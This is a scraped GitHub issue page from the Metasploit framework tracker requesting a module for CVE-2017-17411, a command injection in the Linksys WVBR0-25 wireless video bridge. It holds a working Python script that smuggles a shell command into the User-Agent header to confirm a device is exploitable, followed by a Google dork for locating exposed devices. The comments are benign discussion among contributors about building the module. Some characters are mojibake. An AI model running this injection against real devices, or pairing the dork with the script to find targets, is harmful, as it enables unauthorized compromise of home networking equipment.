Metasploit-framework: [request] CVE-2017-17411 - Linksys WVBR0 25 Command Injection

Created on 15 Dec 2017  路  7Comments  路  Source: rapid7/metasploit-framework 
#!/usr/bin/python
# -*- coding: utf-8 -*-

# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection

"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>

$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""

import requests


def check(url):
    payload = '"; echo "admin'
    md5hash = "456b7016a916a4b178dd72b947c152b7"  # echo "admin" | md5sum

    resp = send_http_request(url, payload)

    if not resp:
        return False

    lines = resp.text.splitlines()
    sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)

    if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
        return False

    if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
        return False

    print("[+] Target is exploitable by CVE-2017-17411 ")
    return True


def send_http_request(url, payload):
    headers = {
        'User-Agent': payload
    }

    response = None
    try:
        response = requests.get(url, headers=headers)
    except Exception as err:
        log.exception(err)

    return response


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 2:
        print("[*] Usage: python %s <URL>" % sys.argv[0])
        sys.exit(0)

    check(sys.argv[1])


# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"

## References

# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

References

  1. https://github.com/nixawk/labs/blob/master/CVE-2017-17411/exploit-CVE-2017-17411.py
picture nixawk

Most helpful comment

I'm planning on working on this over the Holiday, if no one else gets to it by then I'll push a PR.

picture nstarke on 15 Dec 2017
4 🎉1

All 7 comments

I'm planning on working on this over the Holiday, if no one else gets to it by then I'll push a PR.

nstarke picture nstarke on 15 Dec 2017
4 🎉1

I鈥檝e got one written and ready to go btw. I can submit a PR tomorrow since the vendor should be done rolling out updates tonight.

headlesszeke picture headlesszeke on 21 Dec 2017

Obviously that's really great that there will be a module available sooner than planned. I just wish I had known before I ordered the component :-( I was really looking forward to working on this module. Anyways, @headlesszeke its a really cool bug and I'm glad you're contributing a module for it!

nstarke picture nstarke on 21 Dec 2017

Heh, well there鈥檚 a very good chance your module will be better than mine. But also I don鈥檛 think this is the only bug that exists in this device, so it should be money well spent regardless.

headlesszeke picture headlesszeke on 21 Dec 2017

That's quite kind of you to say, but I highly doubt my module would be better than yours. I'll look forward to playing around with the device when it arrives. Who knows, maybe we'll be going through this whole patching process again in a few weeks ;-)

nstarke picture nstarke on 21 Dec 2017

9336 Pull request made. Let me know if there are issues.

headlesszeke picture headlesszeke on 22 Dec 2017

Landed in #9336

bcoles picture bcoles on 6 Jan 2018
Was this page helpful?
0 / 5 - 0 ratings

Related issues

ejholmes picture ejholmes  路  3Comments
notdodo picture notdodo  路  3Comments
fluit105 picture fluit105  路  3Comments
miholtz picture miholtz  路  3Comments
Sonya2010 picture Sonya2010  路  3Comments